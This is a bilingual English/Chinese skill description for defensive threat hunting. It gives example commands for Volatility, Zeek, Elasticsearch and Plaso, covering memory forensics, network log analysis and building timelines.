Back to Details

threat-hunting

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

threat-hunting

威胁狩猎

Purpose

用途

This skill enables proactive detection and response to advanced cyber threats in enterprise environments using forensic tools and analytics. It focuses on identifying anomalies, investigating incidents, and mitigating risks through data-driven methods.
本技能可借助取证工具和分析技术,在企业环境中主动检测并应对高级网络威胁。它专注于通过数据驱动的方法识别异常、调查事件并降低风险。

When to Use

适用场景

Use this skill during active threat investigations, such as unusual network traffic, endpoint anomalies, or post-breach analysis. Apply it in blue-team operations like monitoring for indicators of compromise (IOCs), conducting regular hunts in large-scale networks, or integrating with SIEM systems for real-time alerts.
在主动威胁调查期间使用本技能,例如出现异常网络流量、终端异常或入侵后分析时。可将其应用于蓝队操作,如监控入侵指标(IOCs)、在大规模网络中定期开展威胁狩猎,或与SIEM系统集成以获取实时警报。

Key Capabilities

核心功能

  • Analyze memory dumps with Volatility to detect malware processes.
  • Parse network logs using Zeek for identifying suspicious connections.
  • Query Elasticsearch for threat patterns via custom queries.
  • Generate timelines from forensic artifacts using tools like Plaso.
  • Automate threat correlation with Sigma rules for log analysis.
  • 使用Volatility分析内存转储文件,检测恶意软件进程。
  • 使用Zeek解析网络日志,识别可疑连接。
  • 通过自定义查询在Elasticsearch中检索威胁模式。
  • 使用Plaso等工具从取证工件生成时间线。
  • 利用Sigma规则实现日志分析中的威胁关联自动化。

Usage Patterns

使用模式

Start by collecting data from endpoints or networks, then apply analytics to identify threats. For example, use a pipeline: ingest logs → run queries → correlate events → respond. Always scope hunts to specific IOCs or time windows. If integrating with automation, wrap commands in scripts that handle input validation and output parsing. For multi-step hunts, chain tools like Zeek for capture and Elasticsearch for indexing.
首先从终端或网络收集数据,然后应用分析技术识别威胁。例如,使用以下流程:导入日志 → 运行查询 → 关联事件 → 响应处理。始终将威胁狩猎的范围限定为特定的IOC或时间窗口。如果与自动化集成,请将命令封装在可处理输入验证和输出解析的脚本中。对于多步骤狩猎,可将Zeek(用于捕获)和Elasticsearch(用于索引)等工具串联使用。

Common Commands/API

常用命令/API

Use these commands for threat hunting tasks. Set environment variables for authentication, e.g., export 
$ELASTICSEARCH_API_KEY
for API access.
  • Volatility for memory forensics:
    volatility -f memory.dump --profile=Win7SP1x64 pslist

    This lists processes; add 
    -o output.json
    to save results.
  • Zeek for network analysis:
    zeek -r capture.pcap policy/scripts

    Follow with 
    zeek-cut conn.log | grep "suspicious_ip"
    to filter logs.
  • Elasticsearch API for log queries:
    Use endpoint: 
    POST https://es.example.com/_search
    with body:
    { "query": { "match": { "message": "malware" } } }

    Authenticate via header: 
    Authorization: Bearer $ELASTICSEARCH_API_KEY
    .
  • Plaso for timeline generation:
    log2timeline.py --storage-file timeline.plaso /path/to/logs

    Then query: 
    psort.py -w output.csv timeline.plaso
    .
Config formats: Use JSON for Elasticsearch queries (e.g., above) or INI for Zeek policies (e.g., 
[site] interface=eth0
).
使用以下命令执行威胁狩猎任务。设置环境变量进行身份验证,例如导出
$ELASTICSEARCH_API_KEY
以获取API访问权限。
  • Volatility内存取证
    volatility -f memory.dump --profile=Win7SP1x64 pslist

    该命令列出进程;添加
    -o output.json
    可保存结果。
  • Zeek网络分析
    zeek -r capture.pcap policy/scripts

    后续执行
    zeek-cut conn.log | grep "suspicious_ip"
    过滤日志。
  • Elasticsearch API日志查询
    使用端点:
    POST https://es.example.com/_search
    ,请求体如下:
    { "query": { "match": { "message": "malware" } } }

    通过请求头进行身份验证:
    Authorization: Bearer $ELASTICSEARCH_API_KEY
  • Plaso时间线生成
    log2timeline.py --storage-file timeline.plaso /path/to/logs

    然后查询:
    psort.py -w output.csv timeline.plaso
配置格式:Elasticsearch查询使用JSON(如上例),Zeek策略使用INI(例如
[site] interface=eth0
)。

Integration Notes

集成说明

Integrate this skill with other blue-team tools by piping outputs, e.g., Zeek logs to Elasticsearch via Logstash. For API integrations, use 
$ELASTICSEARCH_API_KEY
in scripts:
bash
curl -H "Authorization: Bearer $ELASTICSEARCH_API_KEY" -X POST https://es.example.com/_ingest/pipeline
Ensure tools share formats like JSON for data exchange. If using containers, mount volumes for forensic data access, e.g., Docker run with 
-v /host/logs:/container/logs
. Test integrations in a sandbox to avoid disrupting production environments.
通过管道输出将本技能与其他蓝队工具集成,例如通过Logstash将Zeek日志导入Elasticsearch。对于API集成,在脚本中使用
$ELASTICSEARCH_API_KEY
bash
curl -H "Authorization: Bearer $ELASTICSEARCH_API_KEY" -X POST https://es.example.com/_ingest/pipeline
确保工具使用JSON等通用格式进行数据交换。如果使用容器,挂载卷以访问取证数据,例如使用Docker运行时添加
-v /host/logs:/container/logs
。在沙箱环境中测试集成,避免影响生产环境。

Error Handling

错误处理

Check for common errors like invalid profiles in Volatility (e.g., if 
--profile
mismatches, output "Error: No suitable profile found"; retry with 
volatility --info
to list options). For API calls, handle 4xx/5xx responses:
python
import requests; response = requests.post(url, headers={'Authorization': f'Bearer {os.environ.get("ELASTICSEARCH_API_KEY")}'}); if response.status_code != 200: raise ValueError(response.text)
In scripts, use try-catch for file not found errors, e.g., in Zeek: check if pcap exists before processing. Log errors to a file with timestamps for auditing.
排查常见错误,例如Volatility中的无效配置文件(如果
--profile
不匹配,会输出"Error: No suitable profile found";可重新运行
volatility --info
查看可用选项)。对于API调用,处理4xx/5xx响应:
python
import requests; response = requests.post(url, headers={'Authorization': f'Bearer {os.environ.get("ELASTICSEARCH_API_KEY")}'}); if response.status_code != 200: raise ValueError(response.text)
在脚本中,使用try-catch处理文件未找到错误,例如在Zeek中:处理前检查pcap文件是否存在。将错误信息连同时间戳记录到文件中,以便审计。

Concrete Usage Examples

具体使用示例

  1. Detect malware in a memory dump:
    First, export 
    $VOLATILITY_PATH=/path/to/volatility
    . Run: 
    volatility -f suspect.dump --profile=Linuxx64x64 pslist | grep "suspicious_process"
    . If matches found, alert via script: 
    echo "Threat detected" >> alert.log
    .
  2. Hunt for network anomalies:
    Capture traffic with Zeek: 
    zeek -i eth0 -C
    . Then query: 
    zeek-cut conn.log | awk '$3 == "192.168.1.100" {print}'
    . Integrate with Elasticsearch: 
    curl -H "Authorization: Bearer $ELASTICSEARCH_API_KEY" -d '{"query":{"match":{"source_ip":"192.168.1.100"}}}' https://es.example.com/_search
    .
  1. 检测内存转储中的恶意软件
    首先导出
    $VOLATILITY_PATH=/path/to/volatility
    。运行:
    volatility -f suspect.dump --profile=Linuxx64x64 pslist | grep "suspicious_process"
    。如果找到匹配项,通过脚本发送警报:
    echo "Threat detected" >> alert.log
  2. 狩猎网络异常
    使用Zeek捕获流量:
    zeek -i eth0 -C
    。然后查询:
    zeek-cut conn.log | awk '$3 == "192.168.1.100" {print}'
    。与Elasticsearch集成:
    curl -H "Authorization: Bearer $ELASTICSEARCH_API_KEY" -d '{"query":{"match":{"source_ip":"192.168.1.100"}}}' https://es.example.com/_search

Graph Relationships

关联关系

  • Related to: blue-team (cluster), as it shares tools for defensive operations.
  • Connected via tags: threat-hunting (direct match), cybersecurity (overlaps with detection skills), blue-team (cluster linkage).
  • Links to: Other blue-team skills like "incident-response" for follow-up actions, and "forensics-analysis" for deeper data examination.
  • 关联对象:蓝队(集群),因为它共享防御操作所需的工具。
  • 标签关联:威胁狩猎(直接匹配)、网络安全(与检测技能重叠)、蓝队(集群关联)。
  • 关联技能:与其他蓝队技能相关联,例如用于后续操作的“事件响应”,以及用于深度数据检查的“取证分析”。